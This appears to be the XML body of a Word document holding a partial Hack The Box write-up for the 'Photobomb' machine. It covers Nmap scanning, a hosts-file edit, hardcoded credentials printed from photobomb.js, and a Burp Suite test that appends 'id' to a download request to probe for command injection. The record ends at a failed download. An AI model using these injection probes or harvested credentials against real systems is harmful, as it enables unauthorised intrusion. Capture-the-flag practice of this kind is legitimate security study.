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E8C" w14:textId="0ECFA57D" w:rsidR="000761C8" w:rsidRDefault="00000000" w:rsidP="001119B7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00514B6A" w:rsidRPr="00514B6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://app.hackthebox.com/profile/1321956</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32ED876E" w14:textId="77777777" w:rsidR="000761C8" w:rsidRDefault="000761C8" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E7A154" w14:textId="658A8CA0" w:rsidR="000761C8" w:rsidRDefault="000761C8" w:rsidP="00571F59">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Machine: Photobomb        Type: Easy </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5933A56E" w14:textId="2CE24F01" w:rsidR="00B47ADE" w:rsidRDefault="00B47ADE" w:rsidP="00B47ADE">
      <w:r>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="007E6CA5">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>ing to machine IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC11F7B" w14:textId="7442909A" w:rsidR="000761C8" w:rsidRDefault="00876DFF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8B24F65" wp14:editId="2B9C9B74">
            <wp:extent cx="5076825" cy="230505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9627" w14:textId="77777777" w:rsidR="000761C8" w:rsidRDefault="000761C8" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A024AE" w14:textId="2B5779EA" w:rsidR="00483E99" w:rsidRDefault="00483E99" w:rsidP="00E3729F">
      <w:r>
        <w:t>2) Conduct a Nmap scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C95CD" w14:textId="35CCF357" w:rsidR="00E3729F" w:rsidRDefault="00E3729F" w:rsidP="00E3729F">
      <w:r>
        <w:t>-Sv determine the version of the service running on port</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-V verbosity level</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-SC Scan with default NSE script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC7D10" w14:textId="7976E59F" w:rsidR="00F94D8C" w:rsidRDefault="00FD6DE2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417F411D" wp14:editId="3A7F5377">
            <wp:extent cx="5731510" cy="7384415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61540004" wp14:editId="666FED27">
            <wp:extent cx="5731510" cy="550862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ADF2" w14:textId="77777777" w:rsidR="0026308B" w:rsidRDefault="0026308B" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5272C1" w14:textId="39DFFB9A" w:rsidR="0026308B" w:rsidRDefault="00AB3525" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidR="0026308B">
        <w:t xml:space="preserve">I found 2 open ports. I shall enumerate </w:t>
      </w:r>
      <w:r w:rsidR="004F3D21">
        <w:t>the one with port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F593E78" w14:textId="66C31DFF" w:rsidR="004F3D21" w:rsidRDefault="00BA75B7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662A829" wp14:editId="20619387">
            <wp:extent cx="5715798" cy="1314633"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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07F" w14:textId="77777777" w:rsidR="00BF297B" w:rsidRDefault="00BF297B" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEE43F7" w14:textId="77777777" w:rsidR="00342A33" w:rsidRDefault="00342A33" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495D07D5" w14:textId="77777777" w:rsidR="00342A33" w:rsidRDefault="00342A33" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232DAA9A" w14:textId="77777777" w:rsidR="00342A33" w:rsidRDefault="00342A33" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733EF7AD" w14:textId="77777777" w:rsidR="00342A33" w:rsidRDefault="00342A33" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0228C118" w14:textId="64FB1257" w:rsidR="00342A33" w:rsidRDefault="00342A33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0EFB765D" wp14:editId="16568A6E">
            <wp:extent cx="5304661" cy="1097280"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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 rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect l="11933" t="28018" r="7606" b="35458"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5347288" cy="110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0B28" w14:textId="36B41F4B" w:rsidR="00BF297B" w:rsidRDefault="009F7889" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidR="003215C2">
        <w:t xml:space="preserve">Tried to </w:t>
      </w:r>
      <w:r w:rsidR="000F7BB5">
        <w:t xml:space="preserve">direct to </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="000F7BB5" w:rsidRPr="00EA2130">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://photobomb.htb/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000F7BB5">
        <w:t xml:space="preserve"> but site could not be reached. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A31AAB" w14:textId="77777777" w:rsidR="00F5719E" w:rsidRDefault="00F5719E" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71068FCB" w14:textId="21F18C49" w:rsidR="00F5719E" w:rsidRDefault="00F5719E" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00F5719E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A9F9B6B" wp14:editId="3390AEB2">
            <wp:extent cx="3196424" cy="2596023"/>
            <wp:effectExtent l="19050" t="19050" r="23495" b="1397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889" cy="2604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E3C9F" w14:textId="569DB315" w:rsidR="00E037C3" w:rsidRDefault="00B429BB" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>I modifed the host</w:t>
      </w:r>
      <w:r w:rsidR="008A18F4">
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
      <w:r w:rsidR="00C035F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A18F4">
        <w:t>This will allows us to redirect to</w:t>
      </w:r>
      <w:r w:rsidR="0087201F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00990490" w:rsidRPr="005B6527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://photobomb.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39BD89CC" w14:textId="513095A7" w:rsidR="00990490" w:rsidRDefault="00990490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4FE9FD16" wp14:editId="5E9F1187">
            <wp:extent cx="2266950" cy="3905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4261" w14:textId="5A9E2DEF" w:rsidR="00E037C3" w:rsidRDefault="00F6442E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15513ED" wp14:editId="04B69EDE">
            <wp:extent cx="6490104" cy="1488611"/>
            <wp:effectExtent l="0" t="0" r="635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l="7744" t="32673" r="16"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6601175" cy="151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80EC" w14:textId="044A793F" w:rsidR="004F3D21" w:rsidRDefault="00C27C00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81A105F" wp14:editId="7291FFCA">
            <wp:extent cx="5731510" cy="3022600"/>
            <wp:effectExtent l="0" t="0" r="254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B27" w14:textId="77777777" w:rsidR="009C6FB9" w:rsidRDefault="009C6FB9" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5063221F" w14:textId="66EFE2B8" w:rsidR="009C6FB9" w:rsidRDefault="009F7889" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>5)</w:t>
      </w:r>
      <w:r w:rsidR="009C6FB9">
        <w:t>When I click</w:t>
      </w:r>
      <w:r w:rsidR="00C035F9">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009C6FB9">
        <w:t xml:space="preserve"> the link “click here “ it prompted me </w:t>
      </w:r>
      <w:r w:rsidR="00887356">
        <w:t>for me user credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C098C8F" w14:textId="77777777" w:rsidR="00017787" w:rsidRDefault="00017787" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42935C14" w14:textId="2600EFFD" w:rsidR="00017787" w:rsidRDefault="00017787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D039029" wp14:editId="5E46CA68">
            <wp:extent cx="5731510" cy="2843530"/>
            <wp:effectExtent l="0" t="0" r="254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2E8" w14:textId="25279C2A" w:rsidR="00AB046D" w:rsidRDefault="00AB046D" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9EBA2A" w14:textId="1358E555" w:rsidR="00FC5ED5" w:rsidRDefault="00FC5ED5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54629BF5" w14:textId="6605FB0A" w:rsidR="00FC5ED5" w:rsidRDefault="00FC5ED5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7CA433" w14:textId="5EB3EBC7" w:rsidR="00FC5ED5" w:rsidRDefault="00FC5ED5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3769146D" w14:textId="554158FC" w:rsidR="00FC5ED5" w:rsidRDefault="00FC5ED5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FFAF03" w14:textId="59E9DC68" w:rsidR="00FC5ED5" w:rsidRDefault="00FC5ED5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB96535" w14:textId="126CA3E2" w:rsidR="00FC5ED5" w:rsidRDefault="00FC5ED5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD7D1DE" w14:textId="77777777" w:rsidR="00FC5ED5" w:rsidRDefault="00FC5ED5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40485D93" w14:textId="7A1B4EED" w:rsidR="00AB046D" w:rsidRDefault="001925B9" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>6)</w:t>
      </w:r>
      <w:r w:rsidR="00AB046D">
        <w:t>When inspecting the code, I noticed there is a javascript</w:t>
      </w:r>
      <w:r w:rsidR="006D58DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C035F9">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="006D58DB">
        <w:t xml:space="preserve">named </w:t>
      </w:r>
      <w:r w:rsidR="001F64ED">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006D58DB">
        <w:t>photobomb.js</w:t>
      </w:r>
      <w:r w:rsidR="001F64ED">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244B52D" w14:textId="5C026503" w:rsidR="00AB046D" w:rsidRDefault="00AB046D" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00AB046D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EA45EE2" wp14:editId="02D90E33">
            <wp:extent cx="5029902" cy="2219635"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="55" name="Picture 5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A394" w14:textId="69DAC7C5" w:rsidR="00BE155E" w:rsidRDefault="001925B9" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="009F7889">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F4622F">
        <w:t xml:space="preserve">The credential can be seen </w:t>
      </w:r>
      <w:r w:rsidR="004B65DC">
        <w:t>in the set</w:t>
      </w:r>
      <w:r w:rsidR="00914797">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="004B65DC">
        <w:t>ttribute</w:t>
      </w:r>
      <w:r w:rsidR="00A83A4F">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00921074">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A83A4F">
        <w:t>Userid: pH</w:t>
      </w:r>
      <w:r w:rsidR="0058643F">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A83A4F">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00912DC8">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A83A4F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003F5731">
        <w:t xml:space="preserve"> Password</w:t>
      </w:r>
      <w:r w:rsidR="0058643F">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C035F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0058643F">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00912DC8">
        <w:t>0Mb</w:t>
      </w:r>
      <w:r w:rsidR="00921074">
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E85B976" w14:textId="18A5029F" w:rsidR="00BE155E" w:rsidRDefault="0092107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D62442A" wp14:editId="468FCF6F">
            <wp:extent cx="5731510" cy="1010285"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="184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F2EDD" w14:textId="77777777" w:rsidR="00F14C84" w:rsidRDefault="00F14C84" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E20634" w14:textId="3FF91B1C" w:rsidR="00F14C84" w:rsidRDefault="00F14C8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291D790" wp14:editId="550F1431">
            <wp:extent cx="2974769" cy="1819231"/>
            <wp:effectExtent l="19050" t="19050" r="16510" b="1016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2925" cy="1824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33FB7" w14:textId="784CAA4E" w:rsidR="002C4709" w:rsidRDefault="002C4709" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302E6427" w14:textId="7EC502B5" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6705D216" w14:textId="65598B67" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3745E076" w14:textId="0EC0D3E1" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168D1D62" w14:textId="3EACE662" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0F16C5" w14:textId="7FE93CE2" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D1A895" w14:textId="533D26FB" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0D56A1" w14:textId="56C14A75" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505260F7" w14:textId="035EC43E" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659B3033" w14:textId="0D94FEC7" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FEE180" w14:textId="77777777" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7950A003" w14:textId="5DF32E5E" w:rsidR="002C4709" w:rsidRDefault="000B40DA" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>8)</w:t>
      </w:r>
      <w:r w:rsidR="003E649A">
        <w:t xml:space="preserve">Entered the website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785445F0" w14:textId="0145FC73" w:rsidR="00D94002" w:rsidRDefault="003E649A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31F06CA" wp14:editId="4D4D0C15">
            <wp:extent cx="5731510" cy="2927350"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="25400"/>
            <wp:docPr id="61" name="Picture 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94002">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62078A91" wp14:editId="0D02F661">
            <wp:extent cx="5731510" cy="2728595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="62" name="Picture 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776" w14:textId="5EF155E8" w:rsidR="00776CE9" w:rsidRDefault="000B40DA" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>9)</w:t>
      </w:r>
      <w:r w:rsidR="00776CE9">
        <w:t xml:space="preserve">Testing for the </w:t>
      </w:r>
      <w:r w:rsidR="00780252">
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="00776CE9">
        <w:t xml:space="preserve"> for command injection, I will try to </w:t>
      </w:r>
      <w:r w:rsidR="00A9358D">
        <w:t xml:space="preserve">download an image. I will use a </w:t>
      </w:r>
      <w:r w:rsidR="00960A59">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00944BBD">
        <w:t>urpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00BF1DF5">
        <w:t xml:space="preserve"> to intercept the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638BD5BB" w14:textId="6DFFE640" w:rsidR="004C286E" w:rsidRDefault="004C286E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60D5374" wp14:editId="4FF06832">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="1841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65CED" w14:textId="77777777" w:rsidR="005665FE" w:rsidRDefault="005665FE" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1671E1D2" w14:textId="3A8D05DA" w:rsidR="000E1631" w:rsidRDefault="000B40DA" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>10)</w:t>
      </w:r>
      <w:r w:rsidR="003534C3">
        <w:t xml:space="preserve">Send </w:t>
      </w:r>
      <w:r w:rsidR="0003748B">
        <w:t xml:space="preserve">the download request </w:t>
      </w:r>
      <w:r w:rsidR="003534C3">
        <w:t>to the repeater</w:t>
      </w:r>
      <w:r w:rsidR="00960A59">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4281444B" w14:textId="359B7220" w:rsidR="003534C3" w:rsidRDefault="00831AFB" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00831AFB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2775F89D" wp14:editId="5D1D8126">
            <wp:extent cx="5731510" cy="5532120"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="11430"/>
            <wp:docPr id="192" name="Picture 1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3E82D" w14:textId="77777777" w:rsidR="00844878" w:rsidRDefault="00844878" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785E93D9" w14:textId="77777777" w:rsidR="00844878" w:rsidRDefault="00844878" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2A148A" w14:textId="781DB0BB" w:rsidR="00844878" w:rsidRDefault="00844878" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2611EFD8" w14:textId="192AF954" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20ABC669" w14:textId="78E77B24" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636BFB7A" w14:textId="409B6AA3" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2556B799" w14:textId="0ACE2DE5" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C35E58" w14:textId="3C0719A1" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776F1026" w14:textId="7ACB79C3" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0B26B2" w14:textId="25D87A6B" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDD292B" w14:textId="4B814FB4" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADB9A9C" w14:textId="77777777" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFB4C64" w14:textId="4B13C318" w:rsidR="000E1631" w:rsidRDefault="00100D7A" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added id to test </w:t>
      </w:r>
      <w:r w:rsidR="0041091D">
        <w:t>for command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D6F11" w14:textId="21A2D5FC" w:rsidR="00F47F18" w:rsidRDefault="00F47F18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7EF7DD7D" wp14:editId="1435A37B">
            <wp:extent cx="5731510" cy="6743700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="244" name="Picture 2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C8AB" w14:textId="68CD5244" w:rsidR="00F75CC9" w:rsidRDefault="00F75CC9" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2E0700" w14:textId="77777777" w:rsidR="00ED50F0" w:rsidRDefault="00ED50F0" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AF6A2A" w14:textId="1360BE0C" w:rsidR="005164F2" w:rsidRDefault="00844878" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>11)</w:t>
      </w:r>
      <w:r w:rsidR="005164F2">
        <w:t xml:space="preserve">Outcome: </w:t>
      </w:r>
      <w:r w:rsidR="002D0ADD" w:rsidRPr="002D0ADD">
        <w:t>Failed to generate a copy of voicu-apostol-MWER49YaD-M-unsplash.jpg</w:t>
      </w:r>
    </w:p>
